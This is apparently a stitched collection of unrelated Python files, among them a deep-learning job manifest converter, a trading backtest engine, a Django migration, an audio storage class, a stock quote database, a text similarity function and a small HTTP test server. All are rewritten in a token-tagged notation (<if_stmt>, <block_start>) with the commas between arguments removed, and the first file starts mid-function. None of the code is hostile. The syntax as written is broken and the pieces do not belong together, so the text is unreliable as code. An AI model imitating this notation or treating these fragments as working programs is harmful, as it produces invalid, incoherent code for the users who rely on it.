<try_stmt><block_start><if_stmt>data['model_definition']['framework']['name']<eq>'tensorflow'<block_start><if_stmt>'1.3'<in>data['model_definition']['framework']['version']<block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.3.0"<block_end><else_stmt><block_start>sample['framework']['version']="1.3.0-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.3.0-py3"<block_end><else_stmt><block_start>sample['framework']['version']="1.3.0-gpu-py3"<block_end><block_end><block_end><elif_stmt>'1.4'<in>data['model_definition']['framework']['version']<block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.4.0"<block_end><else_stmt><block_start>sample['framework']['version']="1.4.0-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.4.0-py3"<block_end><else_stmt><block_start>sample['framework']['version']="1.4.0-gpu-py3"<block_end><block_end><block_end><elif_stmt>'1.5'<in>data['model_definition']['framework']['version']<block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.5.0"<block_end><else_stmt><block_start>sample['framework']['version']="1.5.0-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.5.0-py3"<block_end><else_stmt><block_start>sample['framework']['version']="1.5.0-gpu-py3"<block_end><block_end><block_end><elif_stmt>'1.6'<in>data['model_definition']['framework']['version']<block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.6.0"<block_end><else_stmt><block_start>sample['framework']['version']="1.6.0-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.6.0-py3"<block_end><else_stmt><block_start>sample['framework']['version']="1.6.0-gpu-py3"<block_end><block_end><block_end><elif_stmt>'1.7'<in>data['model_definition']['framework']['version']<block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.7.0"<block_end><else_stmt><block_start>sample['framework']['version']="1.7.0-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="1.7.0-py3"<block_end><else_stmt><block_start>sample['framework']['version']="1.7.0-gpu-py3"<block_end><block_end><block_end><else_stmt><block_start><if_stmt>py2<block_start><if_stmt>CPU<block_start>sample['framework']['version']="latest"<block_end><else_stmt><block_start>sample['framework']['version']="latest-gpu"<block_end><block_end><else_stmt><block_start><if_stmt>CPU<block_start>sample['framework']['version']="latest-py3"<block_end><else_stmt><block_start>sample['framework']['version']="latest-gpu-py3"<block_end><block_end><block_end><block_end><elif_stmt>data['model_definition']['framework']['name']<eq>'caffe'<block_start><if_stmt>CPU<block_start>sample['framework']['version']="cpu"<block_end><else_stmt><block_start>sample['framework']['version']="gpu"<block_end><block_end><elif_stmt>data['model_definition']['framework']['name']<eq>'pytorch'<block_start>sample['framework']['version']="latest"<block_end><block_end><except_stmt><block_start>print("Wrong framework.version contents in {}".format(inputfile))<block_end><if_stmt>data['model_definition']['framework']['name']<ne>"tensorflow"<block_start>sample.pop('evaluation_metrics' <none>)<block_end><block_end><except_stmt><block_start>print("Missing contents in {}".format(inputfile))<block_end><try_stmt><block_start><if_stmt>outputfile<block_start>f=open(outputfile "w")<block_end><else_stmt><block_start>f=open("manifest-FfDL.yaml" "w")<block_end>yaml.default_flow_style=<false><line_sep>yaml.dump(sample f)<line_sep>f.close()<block_end><except_stmt><block_start><if_stmt>outputfile<block_start>print("Cannot write contents to {}".format(outputfile))<block_end><else_stmt><block_start>print("Cannot write contents to manifest-FfDL.yaml.")<block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>argv=sys.argv[1:]<try_stmt><block_start>opts,args=getopt.getopt(argv "i:o:s:" ["ifile=" "ofile=" "sfile="])<block_end><except_stmt>getopt.GetoptError<block_start>print('Format Error: Wrong format.')<line_sep>print('convert-to-FfDL.py -i <inputfile> -o <outputfile> -s <samplefile>')<line_sep>sys.exit(2)<block_end><for_stmt>opt,arg opts<block_start><if_stmt>opt<in>("-i" "--ifile")<block_start>inputfile=arg<block_end><elif_stmt>opt<in>("-o" "--ofile")<block_start>outputfile=arg<block_end><elif_stmt>opt<in>("-s" "--sfile")<block_start>samplefile=arg<block_end><block_end><if_stmt><not>inputfile<block_start>print('Input Error: inputfile cannot be empty.')<line_sep>print('convert-to-FfDL.py -i <inputfile> -o <outputfile> -s <samplefile>')<line_sep>sys.exit(2)<block_end>data=getFfDL()<line_sep>sample=getSampleJob()<line_sep>createJob(sample data)<block_end>
|
<import_stmt>arrow<import_from_stmt>OnePy.constants EVENT<import_from_stmt>OnePy.sys_module.components.exceptions BacktestFinished BlowUpError <import_from_stmt>OnePy.sys_module.metabase_env OnePyEnvBase<import_from_stmt>OnePy.sys_module.models.base_bar BarBase<import_from_stmt>OnePy.sys_module.models.calendar Calendar<class_stmt>MarketMaker(OnePyEnvBase)<block_start>calendar:Calendar=<none><line_sep>@classmethod<def_stmt>update_market cls<block_start><try_stmt><block_start>cls.env.cur_suspended_tickers.clear()<line_sep>cls.calendar.update_calendar()<line_sep>cls._update_bar()<line_sep>cls._update_recorder()<line_sep>cls._check_blowup()<line_sep>cls.env.event_engine.put(EVENT.Market_updated)<block_end><except_stmt>(BacktestFinished BlowUpError)<block_start>cls._update_recorder(final=<true>)# 最后回测结束用close更新账户信息
<raise>BacktestFinished<block_end><block_end>@classmethod<def_stmt>initialize cls<block_start>cls.env.logger.critical(f"正在初始化OnePy")<line_sep>cls._initialize_calendar()<line_sep>cls._initialize_feeds()<line_sep>cls._initialize_cleaners()<line_sep>cls.env.logger.critical(f"{'='<times>15} OnePy初始化成功! {'='<times>15}")<line_sep>cls.env.logger.critical("开始寻找OnePiece之旅~~~")<block_end>@classmethod<def_stmt>_initialize_calendar cls<block_start>cls.calendar=Calendar(cls.env.instrument)<block_end>@classmethod<def_stmt>_initialize_feeds cls<block_start><for_stmt>value list(cls.env.readers.values())<block_start><if_stmt>value.ticker# 若以key命名的,不作为ticker初始化
<block_start>ohlc_bar=cls.get_bar(value.ticker cls.env.sys_frequency)<if_stmt>ohlc_bar.initialize(buffer_day=7)<block_start>cls.env.tickers.append(value.ticker)<line_sep>cls.env.feeds.update({value.ticker:ohlc_bar})<block_end><block_end><block_end><block_end>@classmethod<def_stmt>_initialize_cleaners cls<block_start><for_stmt>ticker list(cls.env.tickers)<block_start><for_stmt>cleaner list(cls.env.cleaners.values())<block_start>bufferday=cleaner.buffer_day<line_sep>cleaner.initialize_buffer_data(ticker bufferday)<block_end><block_end><block_end>@classmethod<def_stmt>_update_recorder cls final=<false><block_start><for_stmt>recorder cls.env.recorders.values()<block_start>recorder.update(order_executed=final)<block_end><block_end>@classmethod<def_stmt>_check_blowup cls<block_start><if_stmt>cls.env.recorder.balance.latest()<le>0<block_start>cls.env.logger.critical("The account is BLOW UP!")<line_sep><raise>BlowUpError<block_end><block_end>@classmethod<def_stmt>_update_bar cls<block_start><for_stmt>ticker cls.env.tickers<block_start>iter_bar=cls.env.feeds[ticker]<try_stmt><block_start>iter_bar.next()<block_end><except_stmt>StopIteration<block_start>todate=arrow.get(cls.env.todate).format("YYYY-MM-DD HH:mm:ss")<if_stmt>cls.env.sys_date<eq>todate<block_start><if_stmt>cls.env.is_show_today_signals<block_start>iter_bar.move_next_ohlc_to_cur_ohlc()<block_end><else_stmt><block_start><raise>BacktestFinished<block_end><block_end><else_stmt><block_start>cls.env.cur_suspended_tickers.append(ticker)<line_sep>cls.env.suspended_tickers_record[ticker].append(cls.env.sys_date)<block_end><block_end><block_end><block_end>@classmethod<def_stmt>get_bar cls ticker frequency<arrow>BarBase<block_start><return>cls.env.recorder.bar_class(ticker frequency)<block_end><block_end>
|
# -*- coding: utf-8 -*-
<import_from_future_stmt> unicode_literals<import_from_stmt>django.db models migrations<import_stmt>uuid<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('wooey' '0013_wooeyjob_uuid_populate') ]<line_sep>operations=[# Set to unique=True
migrations.AlterField(model_name='wooeyjob' name='uuid' field=models.CharField(default=uuid.uuid4 unique=<true> max_length=255) ) ]<block_end>
|
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>numpy<as>np<import_from_stmt>copy deepcopy<import_from_stmt>gym.spaces.box Box<import_stmt>inspect<import_from_stmt>utils.helpers Experience# NOTE: here state0 is always "None"
<import_from_stmt>utils.helpers preprocessAtari rgb2gray rgb2y scale<import_from_stmt>core.env Env<class_stmt>LabEnv(Env)<block_start><def_stmt>__init__ self args env_ind=0<block_start>super(LabEnv self).__init__(args env_ind)<assert_stmt>self.env_type<eq>"lab"<block_end><block_end>
|
<import_stmt>io<import_stmt>logging<import_stmt>os.path<import_from_stmt>aim.sdk.num_utils inst_has_typename<import_from_stmt>aim.sdk.objects.io wavfile<import_from_stmt>aim.storage.object CustomObject<import_from_stmt>aim.storage.types BLOB<line_sep>logger=logging.getLogger(__name__)<line_sep>@CustomObject.alias('aim.audio')<class_stmt>Audio(CustomObject)<block_start>"""Audio object used to store audio objects in Aim repository..
Currently, audio formats are limited to mp3, wav, flac
Args:
data: file path, bytes, io.BaseIO or numpy.array (only for WAV)
format (:obj:`str`): Format of the audio source
rate (:obj:`int`): Rate of the audio file, for WAV defaults to 22500
caption (:obj:`str`, optional): Optional audio caption. '' by default.
"""<line_sep>AIM_NAME='aim.audio'<line_sep># supported audio formats
UNKNOWN=''<line_sep>MP3='mp3'<line_sep>WAV='wav'<line_sep>FLAC='flac'<line_sep>audio_formats=(MP3 WAV FLAC)<def_stmt>__init__ self data format:str='' caption:str='' rate:int=<none><block_start>super().__init__()<line_sep>audio_format=format.lower()<if_stmt>inst_has_typename(data ['ndarray.numpy'])# Currently, only WAV audio formats are supported for numpy
<block_start>audio_format=self.WAV<if_stmt><not>rate<block_start>rate=22500<line_sep>logger.info(f'Parameter "rate" is not provided! Using default: {rate}')<block_end>bs=wavfile.write(rate data)<line_sep>data=bs<block_end># act as a regular file with enforced audio format definition by user side
<if_stmt><not>audio_format<block_start><raise>ValueError('Audio format must be provided.')<block_end><elif_stmt>audio_format<not><in>self.audio_formats<block_start><raise>ValueError(f'Invalid audio format is provided. Must be one of {self.audio_formats}')<block_end><if_stmt>isinstance(data str)<block_start><if_stmt><not>os.path.exists(data)<or><not>os.path.isfile(data)<block_start><raise>ValueError('Invalid audio file path')<block_end><with_stmt>open(data 'rb')<as>FS<block_start>data=FS.read()<block_end><block_end><elif_stmt>isinstance(data io.BytesIO)<block_start>data=data.read()<block_end><if_stmt><not>isinstance(data bytes)<block_start><raise>TypeError('Content is not a byte-stream object')<block_end>extra={'caption':caption 'format':audio_format}<line_sep>self._prepare(data **extra)<block_end><def_stmt>_prepare self data **extra<arrow><none><block_start><assert_stmt>isinstance(data bytes)<for_stmt>k,v extra.items()<block_start>self.storage[k]=v<block_end>self.storage['data']=BLOB(data=data)<block_end><def_stmt>to_numpy self<block_start>"""
This method converts WAV to Numpy array.
Other audio formats are not supported at this moment.
Returns: numpy array
"""<assert_stmt>self.storage['format']<eq>self.__audio_format_map[self.WAV]<line_sep><return>wavfile.read(self.get())<block_end><def_stmt>get self<arrow>io.BytesIO<block_start>"""
Reads data from the inner container and writes it to a buffer
Returns: io.BytesIO
"""<line_sep>bs=self.storage.get('data')<if_stmt><not>bs<block_start><return>io.BytesIO()<block_end><return>io.BytesIO(bytes(bs))<block_end><block_end>
|
<import_stmt>os<import_stmt>os.path<as>osp<import_stmt>sys<import_stmt>google.protobuf<as>pb<import_from_stmt>argparse ArgumentParser<import_stmt>numpy<as>np<import_stmt>shutil<import_stmt>caffe<import_from_stmt>caffe.proto caffe_pb2<line_sep>sys.path.append('waifu2x-chainer')<import_from_stmt>lib srcnn<import_stmt>chainer<def_stmt>main <block_start>caffe.set_mode_cpu()<line_sep>model_name='UpResNet10'<line_sep>model_dir='waifu2x-chainer/models/{}'.format(model_name.lower())<line_sep>model_class=srcnn.archs[model_name]<for_stmt>filename os.listdir(model_dir)<block_start>basename,ext=os.path.splitext(filename)<if_stmt>ext<eq>'.npz'<block_start>model_path=os.path.join(model_dir filename)<line_sep>print(model_path)<line_sep>channels=3<if>'rgb'<in>filename<else>1<line_sep>model=model_class(channels)<line_sep>chainer.serializers.load_npz(model_path model)<line_sep>model.to_cpu()<line_sep>params={}<for_stmt>path,param model.namedparams()<block_start>params[path]=param.array<block_end>net=caffe.Net('upresnet10_3.prototxt' caffe.TEST)<for_stmt>key net.params<block_start>l=len(net.params[key])<line_sep>net.params[key][0].data[<ellipsis>]=params[key+'/W']<if_stmt>l<ge>2<block_start>net.params[key][1].data[<ellipsis>]=params[key+'/b']<block_end><block_end>input_data=np.empty(net.blobs['input'].data.shape dtype=np.float32)<line_sep>input_data[<ellipsis>]=np.random.random_sample(net.blobs['input'].data.shape)<line_sep>net.blobs['input'].data[<ellipsis>]=input_data<line_sep>ret=net.forward()<line_sep>input_data=np.empty(net.blobs['input'].data.shape dtype=np.float32)<line_sep>input_data[<ellipsis>]=np.random.random_sample(net.blobs['input'].data.shape)<line_sep>net.blobs['input'].data[<ellipsis>]=input_data<line_sep>ret=net.forward()<line_sep>batch_y=model(input_data)<line_sep>print(batch_y.array-ret['/conv_post'])<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>caffe.init_log(3)<line_sep>main()<block_end>
|
"""
Random code for testing purposes
"""<import_from_stmt>pathlib Path<import_stmt>subprocess<as>sp<import_from_stmt>p_tqdm p_map<import_stmt>numpy<as>np<def_stmt>run_tractseg subject_id# dir = base / subject_id
<block_start>dir=base/subject_id/"session_1"<line_sep># sp.call(f"TractSeg -i {dir}/peaks.nii.gz --preview", shell=True)
# sp.call(f"TractSeg -i {dir}/peaks.nii.gz --output_type endings_segmentation --preview", shell=True)
# sp.call(f"TractSeg -i {dir}/peaks.nii.gz --output_type TOM --preview", shell=True)
sp.call(f"Tracking -i {dir}/peaks.nii.gz --tracking_format tck --algorithm prob --test 3" shell=<true>)<line_sep># sp.call(f"Tractometry -i {dir}/tractseg_output/TOM_trackings " +
# f"-o {dir}/tractseg_output/Tractometry.csv " +
# f"-e {dir}/tractseg_output/endings_segmentations -s {dir}/FA.nii.gz --tracking_format tck",
# shell=True)
<block_end><if_stmt>__name__<eq>'__main__'# base = Path("/mnt/nvme/data/dwi/tractometry_test_subjectSpace")
<block_start>base=Path("/mnt/nvme/data/dwi/tractseg_example")<line_sep># base = Path("/mnt/nvme/data/dwi/rotation_test")
# subjects = ["s01", "s02", "s03", "s04"]
subjects=["s01"]<line_sep># subjects = ["UZB"]
<def_stmt>process_subject subject_id<block_start>run_tractseg(subject_id)<block_end>p_map(process_subject subjects num_cpus=1 disable=<false>)<line_sep># Run Tractometry statistics
# cd /mnt/nvme/data/dwi/tractometry_test
# plot_tractometry_results -i subjects.txt -o tractometry_result_group.png --mc --save_csv --plot3D metric
<block_end>
|
""""
Copyright 2019 by <NAME> (jwag). All rights reserved.
:license: MIT, see LICENSE for more details.
This packages contains OPTIONAL models for various ORMs/databases that can be used
to quickly get the required DB models setup.
These models have the fields for ALL features. This makes it easy for applications
to add features w/o a DB migration (and modern DBs are pretty efficient at storing
empty values!).
"""<line_sep>
|
"""Cheroot is the high-performance, pure-Python HTTP server used by CherryPy."""<try_stmt><block_start><import_stmt>pkg_resources<block_end><except_stmt>ImportError<block_start><pass><block_end><try_stmt><block_start>__version__=pkg_resources.get_distribution('cheroot').version<block_end><except_stmt>Exception<block_start>__version__='unknown'<block_end>
|
<import_stmt>datetime<import_stmt>logging<import_stmt>os<import_stmt>pandas<as>pd<import_from_stmt>sqlalchemy create_engine and_<import_from_stmt>sqlalchemy.orm sessionmaker<import_from_stmt>yahoo_finance Share YQLResponseMalformedError<import_from_stmt>stocklook.utils.formatters get_stock_data field_map get_stock_data_historical<import_from_stmt>.tables Quote Stock Base WatchList<line_sep>logger=logging.getLogger()<line_sep>logger.setLevel(logging.INFO)<line_sep>DATA_DIR=os.path.join(os.path.dirname(os.path.dirname(__file__)) 'data')<if_stmt><not>os.path.exists(DATA_DIR)<block_start>os.mkdir(DATA_DIR)<block_end>DEFAULT_DATABASE_PATH=os.path.join(DATA_DIR 'db.sqlite3')<line_sep>engine=create_engine('sqlite:///'+DEFAULT_DATABASE_PATH)<line_sep>Session=sessionmaker(bind=engine)<line_sep>stock_keys=Stock.__dict__.keys()<line_sep>quote_keys=Quote.__dict__.keys()<class_stmt>StockDatabase<block_start>STOCK_TIMES=[[5 30] [13 30]]<def_stmt>__init__ self symbols=<none><block_start>Base.metadata.create_all(bind=engine checkfirst=<true>)<line_sep>self._symbols=symbols<block_end><def_stmt>_add_stock self session name data=<none><block_start><if_stmt>data<is><none><block_start><try_stmt><block_start>data=get_stock_data(Share(name) field_map)<block_end><except_stmt><block_start><return><none><block_end><block_end>stock=Stock(**{k:v<for>k,v data.items()<if>k<in>stock_keys})<try_stmt><block_start>session.add(stock)<block_end><except_stmt><block_start><pass><block_end><return>data<block_end><def_stmt>seconds_until_market_open self<block_start>open,close=self.STOCK_TIMES<line_sep>ohour,omin=open<line_sep>chour,cmin=close<line_sep>osec=(ohour<times>60<times>60)+(omin<times>60)<line_sep>csec=(chour<times>60<times>60)+(cmin<times>60)<line_sep>today=datetime.datetime.now()<line_sep>tsec=(today.hour<times>60<times>60)+(today.minute<times>60)<line_sep>weekday=today.weekday()<if_stmt>weekday<l>5<block_start>add=0<block_end><elif_stmt>weekday<eq>5<block_start>add=(48<times>60<times>60)-tsec<block_end><elif_stmt>weekday<eq>6<block_start>add=(24<times>60<times>60)-tsec<block_end><if_stmt>tsec<g>csec<block_start>sec=(24<times>60<times>60)-tsec+osec+add<line_sep>#logger.info("STMO1: Stock market opens in {} hours".format(round(sec/60/60),2))
<block_end><elif_stmt>tsec<l>osec<block_start>sec=osec-tsec+add<line_sep>#logger.info("STMO2: Stock market opens in {} hours".format(round(sec / 60 / 60), 2))
<block_end><else_stmt>#logger.info("STMO3: Stock market is currently open")
<block_start>sec=0+add<block_end><return>sec<block_end><def_stmt>get_quote_latest self session stock<block_start><return>session.query(Quote).filter(Quote.stock_id<eq>stock.id).order_by(Quote.date_inserted.desc()).limit(1).one_or_none()<block_end><def_stmt>get_quote self session stock data=<none><block_start>update_time=pd.Timestamp(datetime.datetime.now())-pd.DateOffset(minutes=15)<if_stmt>stock<is><none><or><not>hasattr(stock 'quotes')<or><not>hasattr(stock 'symbol')<block_start><return><none><block_end>seconds=self.seconds_until_market_open()<line_sep>quote=self.get_quote_latest(session stock)<line_sep>market_closed=(seconds<g>15<times>60)<if_stmt>quote<is><none><or>(<not>market_closed<and>quote.date_inserted<le>update_time)<or>(market_closed<and>quote.date_inserted.minute<l>30<and>quote.date_inserted.hour<eq>13)<block_start><if_stmt>data<is><none><block_start>data=get_stock_data(Share(stock.symbol) field_map)<block_end>quote=Quote(**{k:v<for>k,v data.items()<if>k<in>quote_keys})<line_sep>logger.info("UPDATED QUOTE: {}".format(quote))<line_sep>stock.quotes.append(quote)<block_end><else_stmt><block_start>logging.info("EXISTING QUOTE: {}".format(quote))<block_end><return>quote<block_end><def_stmt>get_quotes self session stocks<block_start><return>[self.get_quote(session s)<for>s stocks]<block_end><def_stmt>get_stock self session symbol<block_start>symbol=symbol.upper()<line_sep>query=session.query(Stock).filter(Stock.symbol<eq>symbol)<line_sep>stock=query.one_or_none()<if_stmt>stock<is><none><block_start>self._add_stock(session symbol)<block_end><else_stmt><block_start><return>stock<block_end><return>query.one_or_none()<block_end><def_stmt>get_stocks self session symbols<block_start><return>[self.get_stock(session s)<for>s symbols]<block_end><def_stmt>get_session self<block_start><return>Session()<block_end><def_stmt>update_stocks self session stocks=<none><block_start><if_stmt><not>stocks<block_start>stocks=session.query(Stock).all()<block_end><try_stmt><block_start><return>self.get_quotes(session stocks)<block_end><except_stmt>Exception<as>e<block_start>logger.error("Error getting quotes: {}".format(e))<line_sep>session.rollback()<block_end><block_end><def_stmt>update_historical self session stock start_date end_date<block_start>share=Share(stock.symbol)<try_stmt><block_start>data=get_stock_data_historical(share start_date end_date)<block_end><except_stmt>YQLResponseMalformedError<as>e<block_start>logger.error(e)<line_sep><return><none><block_end>matching_quotes=session.query(Quote).filter(and_(Quote.stock_id<eq>stock.id Quote.date_last_traded<ge>pd.Timestamp(start_date) Quote.date_last_traded<le>pd.Timestamp(end_date))).order_by(Quote.date_inserted.asc())<line_sep>dates=[pd.Timestamp(q.date_last_traded).date()<for>q matching_quotes.all()<if>pd.Timestamp(q.date_last_traded).hour<g>13]<line_sep>quotes=[]<for_stmt>record data<block_start><try_stmt><block_start><if_stmt>record[Quote.date_last_traded.name].date()<not><in>dates<block_start>quote=Quote(**{k:v<for>k,v record.items()<if>k<in>quote_keys})<line_sep>quote.symbol_name=stock.symbol_name<line_sep>quote.stock_exchange=stock.stock_exchange<line_sep>quote.trade_currency=stock.trade_currency<line_sep>quotes.append(quote)<line_sep>stock.quotes.append(quote)<block_end><block_end><except_stmt>(KeyError ValueError)<as>e<block_start>logger.error("Error parsing historical quote - {} - {}".format(e record))<block_end><block_end>[session.add(q)<for>q quotes]<line_sep><return>quotes<block_end><def_stmt>update_historicals self session stocks=<none> start_date=<none> end_date=<none><block_start>now=pd.Timestamp(datetime.datetime.now())<if_stmt>start_date<is><none><block_start>start_date=now-pd.DateOffset(years=1)<block_end><if_stmt>end_date<is><none><block_start>end_date=now<block_end><return>[self.update_historical(session s start_date end_date)<for>s stocks]<block_end><def_stmt>get_watchlist self session name<block_start><return>session.query(WatchList).filter(WatchList.name<eq>name).one_or_none()<block_end><def_stmt>add_watchlist self session name tickers=<none><block_start>exists=self.get_watchlist(session name)<if_stmt>exists<is><none><block_start>w=WatchList(name=name)<line_sep>session.add(w)<block_end><else_stmt><block_start>w=exists<block_end><if_stmt>tickers<is><not><none><block_start>stocks=self.get_stocks(session tickers)<for_stmt>s stocks<block_start><if_stmt>s<in>w.stocks<block_start><continue><block_end>w.stocks.append(s)<block_end><block_end><return>w<block_end><def_stmt>delete_watchlist self session name<block_start>session.query(WatchList).filter(WatchList.name<eq>name).delete()<block_end><def_stmt>add_watchlist_stocks self session watchlist tickers<block_start>stocks=self.get_stocks(session tickers)<for_stmt>s stocks<block_start><if_stmt>s<in>watchlist.stocks<block_start><continue><block_end>watchlist.stocks.append(s)<block_end><block_end><def_stmt>delete_watchlist_stocks self session watchlist tickers<block_start><for_stmt>stock watchlist.stocks<block_start><if_stmt>stock.symbol<in>tickers<block_start>session.delete(stock)<block_end><block_end><return>watchlist<block_end><block_end>
|
<import_from_stmt>itertools product<import_stmt>numpy<as>np<import_from_stmt>scipy.spatial.distance cosine<import_from_stmt>shorttext.utils tokenize<def_stmt>jaccardscore_sents sent1 sent2 wvmodel sim_words=<lambda>vec1 vec2:1-cosine(vec1 vec2)<block_start>""" Compute the Jaccard score between sentences based on their word similarities.
:param sent1: first sentence
:param sent2: second sentence
:param wvmodel: word-embeding model
:param sim_words: function for calculating the similarities between a pair of word vectors (default: cosine)
:return: soft Jaccard score
:type sent1: str
:type sent2: str
:type wvmodel: gensim.models.keyedvectors.KeyedVectors
:type sim_words: function
:rtype: float
"""<line_sep>tokens1=tokenize(sent1)<line_sep>tokens2=tokenize(sent2)<line_sep>tokens1=list(filter(<lambda>w:w<in>wvmodel tokens1))<line_sep>tokens2=list(filter(<lambda>w:w<in>wvmodel tokens2))<line_sep>allowable1=[<true>]<times>len(tokens1)<line_sep>allowable2=[<true>]<times>len(tokens2)<line_sep>simdict={(i j):sim_words(wvmodel[tokens1[i]] wvmodel[tokens2[j]])<for>i,j product(range(len(tokens1)) range(len(tokens2)))}<line_sep>intersection=0.0<line_sep>simdictitems=sorted(simdict.items() key=<lambda>s:s[1] reverse=<true>)<for_stmt>idxtuple,sim simdictitems<block_start>i,j=idxtuple<if_stmt>allowable1[i]<and>allowable2[j]<block_start>intersection<augadd>sim<line_sep>allowable1[i]=<false><line_sep>allowable2[j]=<false><block_end><block_end>union=len(tokens1)+len(tokens2)-intersection<if_stmt>union<g>0<block_start><return>intersection/union<block_end><elif_stmt>intersection<eq>0<block_start><return>1.<block_end><else_stmt><block_start><return>np.inf<block_end><block_end>
|
<import_from_stmt>http.server HTTPServer BaseHTTPRequestHandler<class_stmt>TestHandler(BaseHTTPRequestHandler)<block_start><def_stmt>_print_request_data self<block_start>content_length=self.headers['Content-Length']<line_sep>print("Content-length: {}".format(content_length))<line_sep>data=self.rfile.read(int(content_length))<line_sep>print(data.decode('utf-8'))<block_end><def_stmt>_send_200 self<block_start>self.send_response(200)<line_sep>self.send_header('Content-type' 'text/html')<line_sep>self.end_headers()<block_end><def_stmt>do_POST self *args **kwargs<block_start>print('POST request received')<line_sep>self._print_request_data()<line_sep>self._send_200()<block_end><def_stmt>do_PUT self *args **kwargs<block_start>print("PUT request received")<line_sep>self._print_request_data()<line_sep>self._send_200()<block_end><block_end><def_stmt>run server_class=HTTPServer handler_class=TestHandler<block_start>server_address=('' 8000)<line_sep>httpd=server_class(server_address handler_class)<line_sep>httpd.serve_forever()<block_end>run()<line_sep>
|
<import_from_stmt>typing Callable Dict List Optional<import_from_stmt>web3 Web3<import_from_stmt>web3.exceptions ExtraDataLengthError<import_from_stmt>web3.middleware geth_poa_middleware<import_from_stmt>brownie.network.middlewares BrownieMiddlewareABC<class_stmt>GethPOAMiddleware(BrownieMiddlewareABC)<block_start>@classmethod<def_stmt>get_layer cls w3:Web3 network_type:str<arrow>Optional[int]<block_start><try_stmt><block_start>w3.eth.get_block("latest")<line_sep><return><none><block_end><except_stmt>ExtraDataLengthError<block_start><return>-1<block_end><block_end><def_stmt>process_request self make_request:Callable method:str params:List<arrow>Dict<block_start>middleware_fn=geth_poa_middleware(make_request self.w3)<line_sep><return>middleware_fn(method params)<block_end><block_end>
|
<import_stmt>pytest<line_sep>ignored_warnings=["ignore:torch.tensor results are registered as constants in the trace." "ignore:Converting a tensor to a Python boolean might cause the trace to be incorrect." "ignore:Converting a tensor to a Python float might cause the trace to be incorrect." "ignore:Using or importing the ABCs from" ]<line_sep>pytestmark=pytest.mark.filterwarnings(*ignored_warnings)<line_sep>
|
<import_from_stmt>rest_framework status viewsets<import_from_stmt>rest_framework.response Response<import_from_stmt>rest_framework mixins<import_from_stmt>modelchimp.models.experiment Experiment<import_from_stmt>modelchimp.api_permissions HasProjectMembership<import_from_stmt>rest_framework.permissions IsAuthenticated<class_stmt>ExperimentMetricAPI(mixins.RetrieveModelMixin viewsets.GenericViewSet)<block_start>queryset=Experiment.objects.all()<line_sep>permission_classes=(IsAuthenticated HasProjectMembership)<def_stmt>retrieve self request model_id *args **kwargs<block_start>instance=self.get_queryset().get(id=model_id)<line_sep>result=dict()<line_sep>result['summary']=[]<line_sep>result['metric']=instance.metrics<line_sep>result['duration']=instance.durations<if_stmt><not>result['metric']<block_start><return>Response(result status=status.HTTP_200_OK)<block_end><for_stmt>metric result['metric']['metric_list']# Get the max and min value
<block_start>metric_max=0<line_sep>metric_min=0<for_stmt>i,m enumerate(result['metric']['evaluation'][metric])<block_start>current_value=m['value']<if_stmt>i<eq>0<block_start>metric_max=current_value<line_sep>metric_min=current_value<line_sep><continue><block_end><if_stmt>current_value<g>metric_max<block_start>metric_max=current_value<block_end><if_stmt>current_value<l>metric_min<block_start>metric_min=current_value<block_end><block_end>metric_dict=dict()<line_sep>metric_dict['name']=metric<line_sep>metric_dict['max']=metric_max<line_sep>metric_dict['min']=metric_min<line_sep>result['summary'].append(metric_dict)<block_end><return>Response(result status=status.HTTP_200_OK)<block_end><block_end>
|
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>pfIsolatedMuons=cms.EDFilter("PFCandidateFwdPtrCollectionStringFilter" src=cms.InputTag("pfMuonsFromVertex") cut=cms.string("pt > 5 & muonRef.isAvailable() & "<concat>"muonRef.pfIsolationR04().sumChargedHadronPt + "<concat>"muonRef.pfIsolationR04().sumNeutralHadronEt + "<concat>"muonRef.pfIsolationR04().sumPhotonEt "<concat>" < 0.15 * pt ") makeClones=cms.bool(<true>))<line_sep>
|
"""Representation of a WeMo OutdoorPlug device."""<import_from_stmt>.switch Switch<class_stmt>OutdoorPlug(Switch)<block_start>"""Representation of a WeMo Motion device."""<block_end>
|
<import_from_stmt>rpython.jit.metainterp compile<import_from_stmt>rpython.jit.metainterp.history Const<import_from_stmt>rpython.jit.metainterp.optimizeopt.dependency DependencyGraph IndexVar <import_from_stmt>rpython.jit.metainterp.optimizeopt.guard GuardStrengthenOpt Guard <import_from_stmt>rpython.jit.metainterp.optimizeopt.test.test_schedule SchedulerBaseTest<import_from_stmt>rpython.jit.metainterp.optimizeopt.test.test_vecopt FakeLoopInfo<import_from_stmt>rpython.jit.metainterp.resoperation rop ResOperation InputArgInt <class_stmt>FakeMemoryRef(object)<block_start><def_stmt>__init__ self array iv<block_start>self.index_var=iv<line_sep>self.array=array<block_end><def_stmt>is_adjacent_to self other<block_start><if_stmt>self.array<is><not>other.array<block_start><return><false><block_end>iv=self.index_var<line_sep>ov=other.index_var<line_sep>val=(int(str(ov.var)[1:])-int(str(iv.var)[1:]))<line_sep># i0 and i1 are adjacent
# i1 and i0 ...
# but not i0, i2
# ...
